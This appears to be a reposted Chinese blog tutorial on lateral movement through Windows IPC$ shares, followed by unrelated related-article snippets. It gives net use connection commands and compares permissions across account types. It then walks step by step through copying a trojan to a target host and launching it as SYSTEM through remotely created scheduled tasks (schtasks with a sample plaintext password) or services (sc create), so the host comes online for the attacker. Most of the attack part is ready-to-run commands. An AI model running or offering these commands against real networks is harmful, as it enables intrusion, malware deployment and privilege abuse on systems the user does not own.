IPC$横向移动

news2024/9/23 9:21:57

一. IPC$介绍和连接方式

1. IPC$介绍

IPC( Internet Process Connection)共享,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。通过ipc$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。

共享文件
文件共享是指主动地在网络上共享自己的计算机文件。默认共享是为了方便管理员进行远程管理而默认开启的,包括所有的逻辑盘(c 、 d 、d d、e 、 a d m i n 、admin admin) 可以实现对这些默认共享目录的访问(如果当前主机(A)用户的账号是administrator,目标机器(B)的账户administrator和A的administrator密码相同,不需要输入密码就可以访问,默认会用本地相同的账号密码进行认证)

2.IPC$连接方式
net use \\IP\ipc$ "password" /user:"username" (工作组)
net use\\域名\ipc$ “域成员密码” /user:域名\域成员账号(域用户)
net use \\IP\ipc$ /del

在这里插入图片描述
在这里插入图片描述

二. IPC$利用的条件

1、开启了139、445端口
IPC$可以实现远程登录及对默认共享资源的访问, 445端口可以实现对共享文件打印机的访问。因此,一般来讲需要445端口的支持。
在这里插入图片描述

2、管理员开启了默认共享
默认共享是为了方便管理员进行远程管理而默认开启的,包括所有的逻辑盘(c$、d$、e$、admin$) 可以实现对这些默认共享目录的访问 (net share)

在这里插入图片描述

3、必须知道对方机器的用户名和密码

在这里插入图片描述

在内网中,很多电脑的账号密码都是一样的,可以通过抓取本地的账号密码,
然后和对方的电脑建立IP连接

共享命令
Net share
Net share c$ /del 删除共享
Net share K=C:设置C盘共享,共享名字为K

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

三. 不同用户IPC$下的命令权限

1.IPC建立之后可以执行很多命令,如下
dir \\IP\c$
tasklist /sIP
type \\IP\c$\文件路径
net time \\IP地址
copy 文件 \\IP地址\C$
2.测试
接下来我么使用不同的用户去建立IPC$看看是否可以执行如下的命令:
administrator
普通管理员
普通用户
域管理员
域内普通用户

administrator

建立连接
在这里插入图片描述
执行命令

dir \\192.168.41.143\C$

在这里插入图片描述

tasklist /s 192.168.41.143

在这里插入图片描述

type \\192.168.41.143\C$\1.txt

在这里插入图片描述

net time \\192.168.41.143

在这里插入图片描述

copy 2.txt \\192.168.41.143\C$

在这里插入图片描述
由上可知admininstrator的所有命令都支持

普通管理员
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
由上可知普通管理员只支持查看时间

普通用户
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
由上可知普通用户只支持查看时间

域管用户
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
由上可知域管支持所有命令

域内普通用户
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

由上可知域内普通用户只支持查看时间

四. IPC$配合计划任务横向

计划任务是系统的常见功能,利用任务计划功能,可以将任何脚本、程序或文档安排在某个最方便的时间运行。任务计划在每次系统启动的时候启动并在后台运行

Windows xp 电脑使用 at命令
Windows XP之后的电脑使用 schtasks
在这里插入图片描述
在这里插入图片描述
IPC配合计划任务横向
环境:已经上线内网中的一台机器抓取到密码,准备横向另一台机器
在这里插入图片描述
先与目标机创建IPC连接
在这里插入图片描述

将木马copy到目标机
在这里插入图片描述

创建计划任务

schtasks /create /s 192.168.41.20 /u administrator /p Lyp010822 /tn test /tr C:/1.exe /sc onstart /RU System /F
schtasks /create /s 192.168.41.20 /tn test /tr C:/1exe  /sc onstart /RU System /F
这里走的是RPC协议

在这里插入图片描述

运行计划任务

schtasks /run /s IP地址  /u username /p password /i /tn "计划任务名称"
schtasks /run /s 192.168.41.20  /u administrator /p Lyp010822 /i /tn "test"

在这里插入图片描述
删除计划任务

schtasks /delete /s IP地址  /u username /p password /tn "计划任务名称" /f
schtasks /delete /s 192.168.41.20  /u administrator /p Lyp010822 /tn "test" /f

在这里插入图片描述

五. IPC$配合服务横向

Microsoft Windows 服务(即,以前的 NT 服务)使您能够创建在它们自己的 Windows 会话中可长时间运行的可执行应用程序

在这里插入图片描述
相关命令
在这里插入图片描述

接上面的步骤成功将木马copy到目标机器
创建服务(这里走的是smb协议)

sc \\192.168.41.20 create test1 binpath= "cmd.exe /c c:\1.exe"

在这里插入图片描述

开启服务成功上线

sc \\ 192.168.41.20 start test1

在这里插入图片描述

删除服务

sc \\192.168.41.20 delete test

在这里插入图片描述

六. IPC$配合盘符横向

盘符映射就是将远程的共享盘映射到自己的电脑上然后操作自己的电脑就可以

net use k: \\IP\c$(前提是建立IPC的连接下)

在这里插入图片描述
但是能在本地进行上传和下载文件
在这里插入图片描述
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1706716.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

css3 笔记02

目录 01 过渡 02 rotate旋转 03 translate函数 04 真正的3D 05 动画 06 阴影 07 自定义字体库 08 自定义动画库 01 过渡 过渡属性的使用: transition-property:要过渡的css属性名 多个属性用逗号隔开 过渡所有属性就写all transition-duration: 过渡的持续时间 s秒 …

网上3d全景虚拟交互展馆沉浸式体验让客户和使用者都满意

在数字化浪潮席卷而来的今天,3D场景网站已成为众多行业展现创意与实力的新舞台。然而,传统的3D建模软件往往因其复杂性和高门槛,让许多渴望创建逼真3D场景的用户望而却步。 幸运的是,华锐视点推出了搭建3D场景网站的编辑器——一款…

力扣hot100学习记录(七)

240. 搜索二维矩阵 II 编写一个高效的算法来搜索 m x n 矩阵 matrix 中的一个目标值 target 。该矩阵具有以下特性: 每行的元素从左到右升序排列。 每列的元素从上到下升序排列。 题意 在二维矩阵中搜索是否存在一个目标值,该矩阵每一行每一列都是升序…

第四十一天 | 62.不同路径 63.不同路径|| 343.整数拆分 96.不同的二叉搜索树

题目:62.不同路径 1.二维dp数组dp[i][j]含义:到达(i,j)位置有dp[i][j]种方法。 2.动态转移方程:dp[i][j] dp[i - 1][j] dp[i][j - 1] 3.初始化:dp[0][j] 1, dp[i][0] 1 (第一…

Verilog实战学习到RiscV - 1 : Yosys 综合

Yosys 综合 实例 一般 FPGA IDE 的第一步都是RTL 综合(Synthesis)。之后就能看到数字电路图了。然后可以做RTL 级的仿真模拟。 直接上代码,这里我们看一个简单的加法器来学习。 module adder(input [7:0] a,input [7:0] b, input …

免费使用知网下载文献

第一步:输入网址:https://digi.library.hb.cn:8443/#/(或搜索湖北省图书馆) 第二步:点击登录按钮。 第三步:使用手机 支付宝 扫描页面左侧二维码。 第四步:手机点击“电子读者证注册”。&…

Android Studio 所有历史版本下载

一、官网链接 https://developer.android.google.cn/studio/archive 操作 二、AndroidDevTools地址 https://www.androiddevtools.cn/ 参考 https://blog.csdn.net/qq_27623455/article/details/103008937

技术创新加速生态繁荣 | 软通动力子公司鸿湖万联亮相OpenHarmony开发者大会2024

5月25日,由开放原子开源基金会OpenHarmony项目群工作委员会主办的OpenHarmony开发者大会2024在深圳成功举行。本次大会紧扣OpenHarmony 4.1 Release版本发布契机,以“鸿心聚力,智引未来”为主题、通过“1场主论坛6场技术分论坛”承载&#xf…

UI卡片设计入门:一步步教你成功逆袭

UI卡片设计是目前流行的UI设计风格。UI卡片设计是对网页中的卡进行分析和重构的设计,那么在设计UI卡片时应该注意什么呢?目前流行哪种UI卡片设计?收集这个UI卡片设计避坑指南,菜鸟也可以反击成UI设计老板~ UI卡片是什么&#xff…

智慧管廊巡检运维解决方案

一、智慧管廊巡检行业目前存在的挑战和难题 智慧管廊巡检行业面临着运行环境的客观影响,如地面施工、液体渗漏、通风不佳、内部空间受限等问题。而管廊巡检机器人系统的出现却具有重大意义。它能够有力地保障管廊安全且可靠地运行,在面对火情、灾情等紧…

2024「618年中盛典」媒体邀约有哪些优惠活动?

传媒如春雨,润物细无声,大家好,我是51媒体网胡老师。 51媒体网2024年618 活动正式开启,也预示着2024传播季—年中盛典的到来,从即日起下单的客户,即可享受满减增等优惠政策,新客更享受折上折的…

养猫久了才知道,为什么宠物空气净化器是养猫必备!效果惊人!

养猫是一件非常愉快的事情,猫咪的陪伴能带给我们无尽的欢乐和温暖。然而,随着时间的推移,许多养猫的朋友会发现一个问题,那就是家中的空气质量变差了,猫毛、异味等问题也随之而来。这时候,一款好的宠物空气…

山东大学软件学院项目实训-创新实训-基于大模型的旅游平台(二十二)- 微服务(2)

目录 4. Ribbon负载均衡 4.1 负载均衡流程 4.2 负载均衡策略 4.3 Ribbon饥饿加载 5. Nacos注册中心 5.1 服务注册到nacos 5.2 nacos服务分级存储模型 5.3 根据权重负载均衡 5.4 环境隔离--namespace 4. Ribbon负载均衡 4.1 负载均衡流程 4.2 负载均衡策略 默认实现是…

python基础知识:py文件转换为jupyter文件

搜索了很多,都没什么用,会出现一些json错误,最终直接新建文件成功: 在自己电脑安装Anaconda,安装jupyter notebook,输入命令打开jupyter notebook: 在Anoconda命令行中cd到自己要转换文件的地址&#xff0…

天正T20专业建筑v7.0~v10.0版本下载,天正T20专业建筑软件获取

利用AutoCAD这一全球知名的图形平台,我们成功研发出了最新一代的T20天正建筑软件V8.0。这款软件以其卓越的性能和专业化的功能,在建筑施工图设计领域展现出了强大的实力,赢得了广大建筑设计师的青睐。 T20天正建筑软件V8.0在继承了AutoCAD的稳…

【自动驾驶技术栈学习】2-软件《大话自动驾驶》| 综述要点总结 by.Akaxi

----------------------------------------------------------------------------------------------------------------- 致谢:感谢十一号线人老师的《大话自动驾驶》书籍,收获颇丰 链接:大话自动驾驶 (豆瓣) (douban.com) -------------…

Beego 使用教程 8:Session 和 Cookie

beego 是一个用于Go编程语言的开源、高性能的 web 框架 beego 被用于在Go语言中企业应用程序的快速开发,包括RESTful API、web应用程序和后端服务。它的灵感来源于Tornado, Sinatra 和 Flask beego 官网:http://beego.gocn.vip/ 上面的 be…

AI架构设计7:TGI

这个专栏主要关注围绕着AI运用于实际的业务场景所需的系统架构设计。整体基于云原生技术,结合开源领域的LLMOps或者MLOps技术,充分运用低代码构建高性能、高效率和敏捷响应的AI中台。该专栏需要具备一定的计算机基础。 若在某个环节出现卡点,…

质量评估门户:您AI内容的质量守护者

在当今这个内容饥渴和内容疯狂的世界里,AI驱动的内容创作既是一种流行趋势,有时也是一个改变游戏规则的存在。但强大的能力伴随着巨大的责任……即确保质量的责任。 想象一下:你拥有一个AI[和创意团队],他们以闪电般的速度输出博…

unity制作app(9)--拍照 相册 上传照片

1.传输照片(任何较大的数据)都需要扩展服务器的内存空间。 2.还需要base64编码 2.1客户端发送位置的编码 2.2服务器接收部分的代码